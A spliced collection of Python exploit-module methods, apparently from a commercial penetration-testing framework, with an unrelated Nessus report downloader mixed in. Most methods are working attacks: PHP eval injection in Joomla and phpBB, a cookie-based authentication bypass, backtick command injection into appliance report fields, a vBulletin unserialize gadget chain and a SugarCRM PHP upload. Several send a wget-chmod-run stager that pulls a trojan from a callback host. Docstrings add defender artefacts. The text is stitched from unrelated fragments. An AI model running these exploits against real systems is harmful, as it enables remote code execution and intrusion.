        # Trojan mode blocks forever to keep the HTTP server thread alive.
        if (self.TROJANMODE == 1):
            while 1:
                time.sleep(1)
        else:
            self.log('[D2SEC] %s' % data)

        return 1
    def run(self):
        """Inject PHP through the ``searchword`` parameter of ``com_search``.

        Flow: optional ``self.test()`` when ``self.version == 0``; build a
        UserAgent on ``<proto>://host:port/<basepath>``; GET ``index.php``
        with ``searchword`` closing a string and calling ``eval($_GET[c])``.
        With ``self.command`` set, output between the ``---1243---`` and
        ``---3421---`` markers is logged and 1 returned; otherwise a
        base64 payload is sent and ``ISucceeded()`` is polled three times.

        Defender note: a ``searchword`` value containing ``";eval(`` on an
        ``option=com_search`` request is the log artefact.
        """
        self.getargs()
        
        self.setInfo("%s attacking %s:%d (in progress)"%(NAME,self.host,self.port))
        self.log("Using version: %s"%self.version)
        if self.version==0:
            ret=self.test()
            if not ret:
                self.setInfo("%s against %s:%d (failed: didn't find vulnerable target!)"%(NAME,self.host,self.port))
                self.log("Testing didn't find vulnerable target")
                return 0

        self.log("Attacking %s:%d"%(self.host,self.port))
        self.log("Basic Auth User: %s"%self.basicauth_user)
        self.log("VHost: %s"%self.hostname)
        if self.ssl:
            protocol="https"
        else:
            protocol="http"

        #If we have to do basic-auth, let's get an object from spkproxy here
        if self.basicauth_user:
            auth=spkproxy.BasicAuth(self.basicauth_user,self.basicauth_password)
        else:
            auth=None
        useragentstring=protocol+"://"+self.host+":%s"%self.port+"/"+self.basepath    
        self.log("useragentstring: %s"%useragentstring)
        UA=spkproxy.UserAgent(useragentstring, auth=auth, hostname=self.hostname, exploit=self)
                                           
        if self.command:
            self.log("Command: %s"%self.command)
            command=self.command
            # Markers delimit the passthru() output so it can be split out below.
            command="print '---1243---\n';passthru(\'"+command+"');print '---3421---\n'; ".strip()
            data = UA.GET("index.php?c=%s&searchword=%%22;eval($_GET[c]);%%23&option=com_search&Itemid=1"%(urllib.quote_plus(command)))
            if "---1243---" in data:
                result=data.split("1243---")[1].split("---3421")[0]
                self.log("Command data: %s"%prettyprint(data))
                self.log("Command result=%s"%prettyprint(result))
                ret=1
            else:
                # NOTE(review): `ret` stays unassigned here when
                # self.version != 0, so `if ret:` below raises UnboundLocalError.
                self.log("Command not run - service patched?!")
        else:
            command=self.get_php_to_mosdef().strip()
            #command=command.replace("/","`pwd|cut -b1`") 
            self.log("PHP Callback Command: %s"%command)
            #we escape it with a " and then have a # to end it as a comment
            #A result of "Invalid argument supplied for foreach()" is normal when it works.
            #data = UA.GET("index.php?c=%s&searchword=%%22;eval(base64_decode($_GET[c]));%%23&option=com_search&Itemid=1"%(b64encode(command)))
            data = UA.GET("index.php?d=%s&c=eval(base64_decode($_GET[d]));&searchword=%%22;eval($_GET[c]);%%23&option=com_search&Itemid=1"%(b64encode(command).strip()),noresponse=True)
            self.log("Looking for PHP connectback")
            for i in xrange(0,3): #wait three seconds for callback
                time.sleep(1)
                ret=self.ISucceeded()
                if ret:
                    break
            if not ret:
                self.log("Did not succeed in getting a callback")
                #if data.count("Parse error"):
                #    self.log("Some sort of parse error in our shellcode :<")
                #file("fail.html","w").write(data)
            
        if ret:
            self.setInfo("%s attacking %s:%d - done (success!)"%(NAME,self.host,self.port))
        else:
            self.setInfo("%s attacking %s:%d - done (failed)"%(NAME,self.host,self.port))
        return ret
    def run(self):
        """Set a fixed cookie and check whether the device page is served.

        After ``self.check()`` the cookie ``self.magicCookie_name`` is set to
        ``self.magicCookie_val`` and the base URL is fetched; a response
        containing ``status/status_deviceinfo`` is counted as success
        (returns 1), ``Protected Object`` as failure (returns 0).

        The ``for node in ...`` loop returns on its first iteration and
        ``node`` is never used, so only the first passed node is processed.

        Defender note: an unauthenticated GET that returns the device-info
        page when a specific cookie value is present is the behaviour this
        module tests for; server-side session validation is the fix.
        """
        for node in self.argsDict['passednodes']:
            self.getargs()
            self.setInfo("%s attacking %s:%d (in progress)" %
                         (NAME, self.host, self.port))
            self.log_info("Using version: %s" % self.version)
            ret = self.check()
            self.setProgress(30)
            if not ret:
                self.setInfo(
                    "%s against %s:%d (failed: didn't find vulnerable target!)"
                    % (NAME, self.host, self.port))
                self.log_info("Testing didn't find vulnerable target")
                return 0

            self.log_info("Attacking %s:%d" % (self.host, self.port))
            #self.log("Basic Auth User: %s"%self.basicauth_user)
            #self.log("VHost: %s"%self.hostname)
            if self.ssl:
                protocol = "https"
            else:
                protocol = "http"

            #If we have to do basic-auth, let's get an object from spkproxy here
            if self.basicauth_user:
                auth = spkproxy.BasicAuth(self.basicauth_user,
                                          self.basicauth_password)
            else:
                auth = None
            # No "/" is inserted between the port and basepath here.
            requestString = protocol + "://" + self.host + ":%s" % self.port + self.basepath
            self.log("RequestString: %s" % requestString)

            UA = spkproxy.UserAgent(requestString,
                                    auth=auth,
                                    hostname=self.hostname,
                                    exploit=self)

            UA.SetCookie(
                self.magicCookie_name,
                self.magicCookie_val)  # to clear the authentigation flag.
            self.log("Cookie: " + self.magicCookie_name + "=" +
                     self.magicCookie_val)
            self.setProgress(50)

            # To-do: Handle enable/disable separatedly
            #
            #UA.SetCookie(self.magicCookie_name,self.magicCookie_val+1) # to restore authentication flag.
            #self.log("Cookie: "+self.magicCookie_name+"="+self.magicCookie_val)

            data = UA.GET("")
            self.setProgress(70)
            if "status/status_deviceinfo" in data:
                self.log("Authentication successfully disabled!")
                self.log("You can now access web interface without password.")
                self.setProgress(100)
                ret = 1
            else:
                if "Protected Object" in data:
                    self.log("Exploit did not work. Wrong offsets?")
                ret = 0

            if ret:
                self.setInfo("%s attacking %s:%d - done (success!)" %
                             (NAME, self.host, self.port))
            else:
                self.setInfo("%s attacking %s:%d - done (failed)" %
                             (NAME, self.host, self.port))
            return ret
    def run(self):
        """Log in with the scraped ``STYLE`` token and submit a crafted ``by``.

        Flow: GET ``/`` and take the last ``name="STYLE"`` value; POST
        credentials to ``/index.php?c=login``; POST ``/index.php?c=logs``
        with ``by`` set to ``user_timeline`<cmd> > backup/d2```; GET
        ``/backup/d2`` for the output.  With no ``cmd`` argument the
        wget/chmod/run string for ``self.trojanname`` is used and the method
        sleeps forever; otherwise the output is logged and 1 returned.
        Returns 0 on login failure or when the output file is 404.

        Defender note: a ``by`` value outside the expected fixed set
        (backticks, ``>``) on ``c=logs`` and a following GET of
        ``/backup/d2`` are the artefacts; validating ``by`` against an
        allow-list is the mitigation.
        """
        # Check arguments
        self.host = self.target.interface
        self.port = int(self.argsDict.get("port", self.port))
        self.username = self.argsDict.get("username", self.username)
        self.password = self.argsDict.get("password", self.password)

        if (self.argsDict.get("cmd", self.cmd) == ""):
            self.TROJANMODE = 1
            self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
            thread.start_new_thread(self.startHTTPServer, ())
        else:
            self.cmd = self.argsDict.get("cmd", self.cmd)

        self.setInfo("%s attacking %s:%d (in progress)" %
                     (NAME, self.host, self.port))
        self.log("Attacking %s:%d" % (self.host, self.port))

        ua = spkproxy.UserAgent("", exploit=self)

        # Authentication
        url = "/"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        data = ua.GET(mainurl)
        m = re.findall('name="STYLE" value="([^"]+)" ', data)
        # NOTE(review): re.findall returns [] rather than None, so this guard
        # never fires; with no match the index below raises IndexError.
        if m is None:
            self.log('[D2SEC] Unable to get a valid session id')
            return 0
        style = m[len(m) - 1]
        self.log("STYLE=%s" % style)

        url = "/index.php?c=login"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        params = urllib.urlencode({
            'STYLE': style,
            'destination': '',
            'section': '',
            'username': self.username,
            'password': self.password
        })
        data = ua.POST(mainurl, params)

        if "Invalid username" in data:
            self.log('[D2SEC] Authentication error')
            return 0

    # Exploitation
        # Output is redirected to backup/d2, relative to the web root.
        self.cmd = 'user_timeline`%s > backup/d2`' % self.cmd
        url = "/index.php?c=logs"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        params = urllib.urlencode({
            'STYLE': style,
            'period': 'today',
            'xperiod': '',
            'sb_xperiod': 'xdays',
            'startDate': '',
            'txt_time_start': '12:00 AM',
            'endDate': '',
            'txt_time_end': '11:59 PM',
            'txt_filter_user_timeline': '',
            'action': 'search',
            'by': self.cmd,
            'search': '',
            'sort': 'time',
            'multiplier': '1',
            'start': '',
            'end': '',
            'direction': '1',
            '_': ''
        })
        data = ua.POST(mainurl, params)

        url = "/backup/d2"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        data = ua.GET(mainurl)

        if '404 - File not found' in data:
            self.log('[D2SEC] No valid session id found')
            return 0

        # Trojan mode blocks forever to keep the HTTP server thread alive.
        if (self.TROJANMODE == 1):
            while 1:
                time.sleep(1)
        else:
            self.log('[D2SEC] %s' % data)

        return 1
    def run(self):
        """Exploit entry point: authenticate to the web UI, then run a shell command through the
        ``unblockip`` parameter of the monitored-search report page.

        Inputs come from ``self.argsDict`` (``port``, ``username``, ``password``,
        ``cmd``) and fall back to the instance defaults, which are set elsewhere
        (not in view). With an empty ``cmd`` the module switches to "trojan
        mode": the command sent makes the appliance fetch ``trojanname`` from
        ``callback.ip`` over plain HTTP into ``/tmp``, mark it executable and
        run it, while ``startHTTPServer`` (not in view) serves that file on a
        separate thread.

        Returns:
            0 on session/authentication failure or when ``/backup/d2`` is not
            found, 1 once the command output was read back. In trojan mode the
            method never returns (see the sleep loop at the end).

        Host/network artifacts a defender can look for: ``backup/d2`` under
        the web root, ``/tmp/<trojanname>``, an outbound HTTP fetch from the
        appliance to the callback address, and the fixed User-Agent below.
        """
        # Check arguments
        self.host = self.target.interface
        self.port = int(self.argsDict.get("port", self.port))
        self.username = self.argsDict.get("username", self.username)
        self.password = self.argsDict.get("password", self.password)

        if (self.argsDict.get("cmd", self.cmd) == ""):
            # Trojan mode: download-and-execute stager; the HTTP server that
            # hands out trojanname runs on its own thread.
            self.TROJANMODE = 1
            self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
            thread.start_new_thread(self.startHTTPServer, ())
        else:
            self.cmd = self.argsDict.get("cmd", self.cmd)

        self.setInfo("%s attacking %s:%d (in progress)" %
                     (NAME, self.host, self.port))
        self.log("Attacking %s:%d" % (self.host, self.port))

        # Every request goes out with this static Firefox 54 User-Agent, so the
        # header plus the request sequence below is a cheap log signature.
        ua = spkproxy.UserAgent("", exploit=self)
        ua.addHeader(
            "User-Agent",
            "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
        )

        # Authentication: the login form needs the STYLE value embedded in the
        # landing page. self.protocol is assumed to be set on the instance.
        url = "/"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        data = ua.GET(mainurl)
        m = re.findall('name="STYLE" value="([^"]+)" ', data)
        # NOTE(review): re.findall() returns a list, never None, so this guard
        # cannot fire; with no match, the indexing two lines down raises
        # IndexError instead of logging the failure.
        if m is None:
            self.log('[D2SEC] Unable to get a valid session id')
            return 0
        # The last STYLE value found on the page is used.
        style = m[len(m) - 1]

        url = "/index.php?c=login"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        params = urllib.urlencode({
            'STYLE': style,
            'destination': '',
            'section': '',
            'username': self.username,
            'password': self.password
        })
        data = ua.POST(mainurl, params)

        # The login page's rejection text is the only failure signal checked.
        if "Invalid username" in data:
            self.log('[D2SEC] Authentication error')
            return 0

        # Exploitation: the command is placed in backticks with its output
        # redirected to backup/d2 (relative to the web root) and sent as the
        # unblockip query parameter.
        self.cmd = '1.1.1.1_1.1.1.2`%s > backup/d2`' % self.cmd
        url = "/index.php?c=users_monitored_search_queries&section=reports&STYLE=%s&unblockip=%s" % (
            style, urllib.quote(self.cmd))
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        data = ua.GET(mainurl)

        # Read the output file back over HTTP. A 404 means the command did not
        # run (or wrote nowhere readable); the log text below about the session
        # id is misleading about the actual cause.
        url = "/backup/d2"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        data = ua.GET(mainurl)

        if '404 - File not found' in data:
            self.log('[D2SEC] No valid session id found')
            return 0

        if (self.TROJANMODE == 1):
            # Park this thread forever so the HTTP server thread keeps running;
            # `return 1` below is unreachable in this mode.
            while 1:
                time.sleep(1)
        else:
            # Non-trojan mode: data holds the command output.
            self.log('[D2SEC] %s' % data)

        return 1
    def run(self):
        """Exploit entry point for the vBulletin ``unserialize()`` module: send the request built by
        ``geturlarguments()``, trigger ``z.php``, then ask the target to delete it.

        Steps: ``getargs()``; when no ``basepath`` was given, ``test()`` must
        find a vulnerable path or the run is abandoned; a spkproxy UserAgent
        is bound to ``protocol://hostname:port<basepath>`` (BasicAuth when a
        user is configured, a randomized User-Agent always); the request whose
        arguments ``geturlarguments()`` builds (not in view) is sent; ``z.php``
        is then requested with a base64-encoded PHP MOSDEF payload,
        ``ISucceeded()`` is polled for up to ~5 s, and a final request carries
        a serialized ``vB_dB_Result`` object whose recordset string is
        ``unlink('./z.php');``.

        Returns:
            0 when testing finds no vulnerable target; otherwise the last
            ``ISucceeded()`` value (truthy on callback). ``ret`` is always
            bound here because the polling loop runs at least once.

        Detection notes: ``z.php`` is expected to exist beside the vulnerable
        script by the time it is requested (presumably created by the first
        request) and is unlinked again at the end; the cleanup query string
        carries ``%00%2A%00`` — URL-encoded null bytes around ``*`` — which
        stand out in web access logs.
        """
        self.getargs()

        self.setInfo("%s attacking %s:%d (in progress)" % (self.name, self.host, self.port))
        self.log("Using version: %s" % self.version)

        #
        # If we don't get a basepath argument we try to figure it out through
        # self.basepaths
        #
        if not self.basepath:
            ret = self.test()
            if not ret:
                self.setInfo("%s against %s:%d (failed: didn't find vulnerable target!)" % (self.name, self.host, self.port))
                self.log("Testing didn't find vulnerable target")
                return 0

        # Fall back to the IP/interface when no virtual host name was given.
        if not self.hostname:
            self.hostname = self.host

        self.log("Attacking %s:%d" % (self.host, self.port))
        self.log("Basic Auth User: %s" % self.basicauth_user)
        self.log("VHost: %s" % self.hostname)

        #setup our UA first
        if self.ssl:
            protocol = "https"
        else:
            protocol = "http"

        #If we have to do basic-auth, let's get an object from spkproxy here
        if self.basicauth_user:
            auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password)
        else:
            auth = None

        # The UserAgent is stored on self so helpers called below can reuse it.
        targetstring = protocol + "://" + self.hostname + ":" + str(self.port) + self.basepath
        self.ua = spkproxy.UserAgent(targetstring, auth=auth, hostname=self.hostname, exploit=self)

        if hasattr(self, "content_type"):
            self.ua.addHeader("Content-Type", self.content_type)

        # Testing may need to change if it mucks with anything..
        # Unlike the modules with a hard-coded browser string, this one picks
        # a random User-Agent per run (random_ua() not in view).
        self.ua.addHeader("User-Agent", self.random_ua())

        noresponse = True
        if self.command:
            #we do get the response if we are sending it a command
            noresponse = False

        data = self.ua.GET(self.targetpath + "?" + self.geturlarguments(), noresponse=noresponse)

        if self.command and data:
            # Return value is not used; parse_command_response presumably logs.
            blah = self.parse_command_response(data)

        sleep(1)

        #
        # Time to trigger our php callback
        #
        cback = self.get_php_to_mosdef()
        cback = b64encode(cback).strip()
        t = "z.php?c=%s" % cback

        data = self.ua.GET(t, noresponse=noresponse)

        #
        # Wait 5 seconds for callback
        #
        for i in range(0, 5):
            ret = self.ISucceeded()
            if ret:
                break
            sleep(1)

        #
        # Cleanup
        #
        # NOTE(review): warning level is used for routine progress messages.
        logging.warning("Performing cleanup")
        command = """unlink('./z.php');"""
        # Serialized PHP object; the s:%d length prefix must match the
        # recordset string exactly or PHP rejects the whole blob.
        serialized_arg  = """arguments=O:12:"vB_dB_Result":2:{s:5:"*db";O:17:"vB_Database_MySQL":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"assert";}}s:12:"*recordset";s:%d:"%s";}""" % (len(command), command)
        # quote() keeps '=' literal; the '*' (%2A) of each protected property
        # name is wrapped in %00 bytes, matching PHP's "\0*\0name" encoding.
        arg = quote(serialized_arg, safe="=").replace("%2A", "%00%2A%00")
        data = self.ua.GET(self.targetpath + "?" + arg)
        logging.warning("Cleanup DONE")

        self.setInfo("%s attacking %s:%d (DONE)" % (self.name, self.host, self.port))
        self.setProgress(100)

        return ret
<![CDATA[]]>    def run(self):
        """Exploit entry point: authenticate to the web UI, then run a shell command through the
        ``token`` field of the ``traf_users`` report form.

        Same flow as the sibling D2SEC modules: ``port``/``username``/
        ``password``/``cmd`` are read from ``self.argsDict`` with instance
        defaults (set elsewhere, not in view); an empty ``cmd`` selects
        "trojan mode", where the command makes the appliance download
        ``trojanname`` from ``callback.ip`` over plain HTTP into ``/tmp`` and
        execute it while ``startHTTPServer`` serves it on a separate thread.
        The command output is written by the target to ``backup/d2`` and read
        back over HTTP.

        Returns:
            0 on session/authentication failure or when ``/backup/d2`` is not
            found, 1 once the output was read back; never returns in trojan
            mode.

        Artifacts for defenders: ``backup/d2`` under the web root,
        ``/tmp/<trojanname>``, the appliance fetching from the callback
        address, a fixed User-Agent, and a ``traf_users`` PDF report request
        with a backtick expression in ``token``.
        """
        # Check arguments
        self.host = self.target.interface
        self.port = int(self.argsDict.get("port", self.port))
        self.username = self.argsDict.get("username", self.username)
        self.password = self.argsDict.get("password", self.password)

        if (self.argsDict.get("cmd", self.cmd) == ""):
            # Trojan mode: download-and-execute stager served by our own
            # HTTP server thread.
            self.TROJANMODE = 1
            self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
            thread.start_new_thread(self.startHTTPServer, ())
        else:
            self.cmd = self.argsDict.get("cmd", self.cmd)

        self.setInfo("%s attacking %s:%d (in progress)" %
                     (NAME, self.host, self.port))
        self.log("Attacking %s:%d" % (self.host, self.port))

        # Static Firefox 54 User-Agent on every request (log signature).
        ua = spkproxy.UserAgent("", exploit=self)
        ua.addHeader(
            "User-Agent",
            "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
        )

        # Authentication: scrape the STYLE value the login form requires.
        # self.protocol is assumed to be set on the instance.
        url = "/"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        data = ua.GET(mainurl)
        m = re.findall('name="STYLE" value="([^"]+)" ', data)
        # NOTE(review): re.findall() never returns None; with no match this
        # guard is skipped and m[len(m) - 1] raises IndexError.
        if m is None:
            self.log('[D2SEC] Unable to get a valid session id')
            return 0
        style = m[len(m) - 1]

        url = "/index.php?c=login"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        params = urllib.urlencode({
            'STYLE': style,
            'destination': '',
            'section': '',
            'username': self.username,
            'password': self.password
        })
        data = ua.POST(mainurl, params)

        # Only the login page's rejection text is checked.
        if "Invalid username" in data:
            self.log('[D2SEC] Authentication error')
            return 0

        # Exploitation: command in backticks, output redirected to backup/d2,
        # submitted as the 'token' field of the traf_users report (PDF) form.
        self.cmd = '0.3156784180233425`%s > backup/d2`' % self.cmd
        url = "/index.php?c=report&name=traf_users"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        params = urllib.urlencode({
            'STYLE': style,
            'chart': 'pie',
            'period': 'custom',
            'multiplier': '1',
            'metric': '',
            'token': self.cmd,
            'start': '07/28/2017',
            'end': '07/28/2017',
            'filters':
            '{"topn": "25", "department": "sophos_swa_all_departments"}',
            'pdf': '1'
        })
        data = ua.POST(mainurl, params)

        # Fetch the output file; a 404 means the command did not produce it
        # (the log message about the session id is misleading).
        url = "/backup/d2"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        data = ua.GET(mainurl)

        if '404 - File not found' in data:
            self.log('[D2SEC] No valid session id found')
            return 0

        if (self.TROJANMODE == 1):
            # Keep the thread (and the HTTP server thread) alive indefinitely;
            # `return 1` is unreachable in this mode.
            while 1:
                time.sleep(1)
        else:
            # data holds the command output.
            self.log('[D2SEC] %s' % data)

        return 1
    def run(self):
        """Exploit entry point for the phpBB ``viewtopic.php`` ``highlight`` module.

        With ``self.command`` set, the command is wrapped in PHP ``passthru()``
        between the markers ``---1243---`` and ``---3421---`` and whatever the
        response contains between them is logged as the result. Without a
        command, a PHP MOSDEF connect-back from ``get_php_to_mosdef()`` is sent
        instead and ``ISucceeded()`` decides the outcome. Both variants travel
        in the ``highlight`` parameter of ``viewtopic.php`` (see the GET below).

        Returns:
            0 when ``test()`` (only run for ``version == 0``) finds no
            vulnerable target; otherwise ``ret``.

        Known issue: ``ret`` is bound only by ``test()``, by the marker check
        succeeding, or by ``ISucceeded()``. When ``version != 0`` and the
        markers are not found, ``ret`` is unbound and the final ``if ret``
        raises UnboundLocalError instead of reporting failure.

        Detection notes: the literal markers and the ``eval($_GET[c])``
        fragment appear verbatim in the request URL.
        """
        self.getargs()

        self.setInfo("%s attacking %s:%d (in progress)" %
                     (NAME, self.host, self.port))

        if self.version == 0:
            ret = self.test()
            if not ret:
                self.log("Testing didn't find vulnerable target")
                return 0

        self.log("Attacking %s:%d" % (self.host, self.port))
        self.log("Basic Auth User: %s" % self.basicauth_user)
        self.log("VHost: %s" % self.hostname)
        if self.ssl:
            protocol = "https"
        else:
            protocol = "http"

        #If we have to do basic-auth, let's get an object from spkproxy here
        if self.basicauth_user:
            auth = spkproxy.BasicAuth(self.basicauth_user,
                                      self.basicauth_password)
        else:
            auth = None

        # Base URL: protocol://host:port/<basepath>; hostname is sent as the
        # virtual host.
        UA = spkproxy.UserAgent(protocol + "://" + self.host +
                                ":%s" % self.port + "/" + self.basepath,
                                auth=auth,
                                hostname=self.hostname,
                                exploit=self)

        if self.command:
            self.log("Command: %s" % self.command)
            command = self.command
            # NOTE(review): .strip() binds to the last string literal only
            # (method call before '+'), so it merely trims that literal's
            # trailing space, not the whole concatenation.
            command = "print '---1243---\n';passthru(\'" + command + "');print '---3421---\n'; ".strip(
            )
            data = UA.GET(
                "viewtopic.php?c=%s&t=1&highlight=%%2527.eval($_GET[c]).%%2527"
                % (urllib.quote_plus(command)))
            if "---1243---" in data:
                # Output sits between the two markers.
                result = data.split("1243---")[1].split("---3421")[0]
                self.log("Command data: %s" % prettyprint(data))
                self.log("Command result=%s" % prettyprint(result))
                ret = 1
            else:
                # ret is left unbound on this path when version != 0.
                self.log("Command not run - service patched?!")
        else:
            command = self.get_php_to_mosdef().strip()
            # Every "/" is swapped for a backtick expression yielding the first
            # character of `pwd`, so the payload contains no literal slash.
            command = command.replace("/", "`pwd|cut -b1`")
            self.log("Command: %s" % command)
            data = UA.GET(
                "viewtopic.php?c=%s&t=1&highlight=%%2527.eval($_GET[c]).%%2527"
                % (urllib.quote_plus(command)))
            self.log("Looking for PHP connectback")
            ret = self.ISucceeded()

        if ret:
            self.setInfo("%s attacking %s:%d - done (success!)" %
                         (NAME, self.host, self.port))
        else:
            self.setInfo("%s attacking %s:%d - done (failed)" %
                         (NAME, self.host, self.port))
        return ret
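    def download(self, widget):
        """Let the user pick Nessus scans in a dialog and save them as ``.nessus`` reports.

        Opens the ``simple2.glade`` "exploit_dialog" with a multi-select tree
        (Name / Date / Reference). For every selected row the scan reference
        (column 2) is exported through the Nessus API, the export status is
        polled until "ready", and the report is written to
        ``<exploitpath>/reports/``. Each saved path is appended to
        ``self.ReportFiles`` and to ``self.treestore_2``. The dialog is
        destroyed on every exit path, including exceptions.

        Args:
            widget: the GTK widget that emitted the signal; unused.

        Returns:
            None.
        """
        self.SelectedScan = []
        column_names = ['Name', 'Date', 'Reference']
        gladefile = self.exploitpath + "simple2.glade"
        self.wTree2 = gtk.glade.XML(gladefile)

        handlers = {
            "on_start_clicked": self.start,
            "on_delreport_toggled": self.activatedel,
            "on_deselectall_clicked": self.deselectall,
            "on_selectall_clicked": self.selectall
        }
        self.wTree2.signal_autoconnect(handlers)

        self.loaddlg = self.wTree2.get_widget("exploit_dialog")

        # Best effort: a missing or unreadable d2.ico must not break the dialog.
        try:
            self.loaddlg.set_icon_from_file(self.exploitpath + "d2.ico")
        except Exception:
            pass

        # Init reports treeview (kept on self: the select/deselect handlers use it).
        self.treeview_3 = self.wTree2.get_widget("mytree")
        self.treestore_3 = gtk.TreeStore(str, str, str)
        self.treeview_3.set_show_expanders(False)
        self.treeview_3.set_model(self.treestore_3)
        self.treeselection = self.treeview_3.get_selection()
        self.treeselection.set_mode(gtk.SELECTION_MULTIPLE)

        # One resizable, sortable text column per model column.
        for idx, title in enumerate(column_names):
            column = gtk.TreeViewColumn(title, gtk.CellRendererText(), text=idx)
            column.set_resizable(True)
            column.set_sort_column_id(idx)
            self.treeview_3.append_column(column)

        # Start downloader dialog; the finally guarantees it is torn down.
        try:
            result = self.loaddlg.run()

            if result == gtk.RESPONSE_OK:
                if self.treeselection.count_selected_rows() > 0:
                    model, paths = self.treeselection.get_selected_rows()

                    # Column 2 holds the scan reference used in the API URLs.
                    for path in paths:
                        row = self.treestore_3.get_iter(path)
                        self.SelectedScan.append(model.get_value(row, 2))

                    mainurl = "https://" + self.qhost + ":" + self.port
                    headers = [("Content-Type", "application/json")]
                    UA = spkproxy.UserAgent(mainurl, exploit=self)
                    # The Nessus session token is sent in the X-Cookie header.
                    UA.addHeader("X-Cookie", "token=%s" % self.token)

                    for ref in self.SelectedScan:
                        filename = self._fetch_nessus_report(UA, headers, ref)
                        if filename is not None:
                            self.ReportFiles.append(filename)
                            self.treestore_2.append(None, [filename])
                else:
                    self.log("[D2 LOG] - No Nessus report selected")
        finally:
            self.loaddlg.destroy()

    def _fetch_nessus_report(self, UA, headers, ref):
        """Export one scan through the Nessus API and save it under ``reports/``.

        Args:
            UA: spkproxy.UserAgent already carrying the X-Cookie token.
            headers: extra headers for the export POST (JSON content type).
            ref: scan reference, interpolated into ``exporturl``, ``statusurl``
                and ``reporturl``.

        Returns:
            The local path of the saved report, or None when the export could
            not be requested, never became ready within ~20 s, or the API
            replied with something that is not JSON.
        """
        self.log("[D2 LOG] Nessus get file information for %s" % ref)
        data = UA.POST(self.exporturl % ref,
                       data=json.dumps({'format': 'nessus'}),
                       extraheaders=headers)
        try:
            response = json.loads(data)
        except ValueError:
            self.log("[D2 LOG] Export request returned non-JSON data")
            return None
        if "file" not in response:
            self.log("[D2 LOG] No file available")
            return None
        file_id = response["file"]

        # Poll the export status, one request per second, for up to 20 tries.
        self.log("[D2 LOG] Nessus get status file %s" % file_id)
        ready = False
        for _ in range(20):
            try:
                response = json.loads(UA.GET(self.statusurl % (ref, file_id)))
            except ValueError:
                self.log("[D2 LOG] Status request returned non-JSON data")
                break
            if "status" not in response:
                self.log("[D2 LOG] Status not found")
                break
            if response["status"] == "ready":
                ready = True
                break
            time.sleep(1)
        if not ready:
            return None

        self.log("[D2 LOG] Nessus download file %s" % file_id)
        data = UA.GET(self.reporturl % (ref, file_id))

        reports_dir = self.exploitpath + "reports/"
        if not os.path.exists(reports_dir):
            os.mkdir(reports_dir)

        # The reference comes from the API; flattening "/" keeps the file inside
        # reports/ (a bare ".." would still not be rejected here).
        filename = reports_dir + ref.replace("/", "_")
        with open(filename, "w") as f:
            f.write(data)
        return filename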
    def run(self):
        """Exploit entry point for the SugarCRM e-mail attachment upload module.

        Logs in through ``loginpage`` with ``username``/``password``, saves a
        timezone (without one the user-id page is not reachable, per the
        author's note below), scrapes ``assigned_user_id`` from
        ``composemailpage``, uploads the multipart body returned by
        ``getfile()`` (not in view), derives the stored name ``<guid>.php``
        from the JSON reply, requests ``pathtoourfile//<userid>//<guid>.php``
        to run it, and polls ``ISucceeded()`` for ~3 s.

        Returns:
            0 when the user id or the uploaded file name cannot be parsed;
            otherwise the last ``ISucceeded()`` value. ``ret`` is always bound
            because the polling loop runs at least once.

        Review notes: the ``test()`` result is ignored; both parsing steps use
        bare ``except:``; the opening status line uses ``self.hostname`` while
        the closing ones use ``self.host``.

        Detection notes: the fixed multipart boundary string, a ``.php`` file
        under the per-user attachment path, and the timezone save right after
        login are all visible in access logs.
        """
        self.getargs()
        # NOTE(review): result stored but never checked.
        test = self.test()
        self.setInfo("%s attacking %s:%d (in progress)" %
                     (NAME, self.hostname, self.port))

        self.log("Attacking %s:%d" % (self.hostname, self.port))
        #self.log("Basic Auth User: %s"%self.basicauth_user)
        self.log("VHost: %s" % self.hostname)
        if self.ssl:
            protocol = "https"
        else:
            protocol = "http"

        #If we have to do basic-auth, let's get an object from spkproxy here
        if self.basicauth_user != "":
            auth = spkproxy.BasicAuth(self.basicauth_user,
                                      self.basicauth_password)
        else:
            auth = None

        useragentstring = protocol + "://" + self.host + ":%s" % self.port + "/" + self.basepath
        self.log("useragentstring: %s" % useragentstring)

        UA = spkproxy.UserAgent(useragentstring,
                                auth=auth,
                                hostname=self.hostname,
                                exploit=self)

        # Credentials go in the form-encoded POST body, unescaped.
        response = UA.POST(
            self.loginpage,
            "module=Users&action=Authenticate&return_module=Users&return_action=Login&cant_login=&login_module=&login_action=&login_record=&user_name=%s&user_password=%s&login_theme=Sugar&login_language=en_us&Login=++Login++"
            % (self.username, self.password),
            noresponse=False)
        #self.log("AFTER LOGIN %s"%response)

        #if the user has not assigned a valid timezone in which they reside then we can't continue to get a userid
        #if "action=SetTimezone" in response:
        #self.log("setting time zone for %s"%self.username)
        # Done unconditionally (the guard above is commented out).
        response = UA.POST(
            self.timezonepage,
            "record=&module=Users&action=SaveTimezone&SaveTimezone=true&timezone=America%2FNew_York&button=++Save++"
        )
        #self.log(response)

        #find out what are assigned userid is
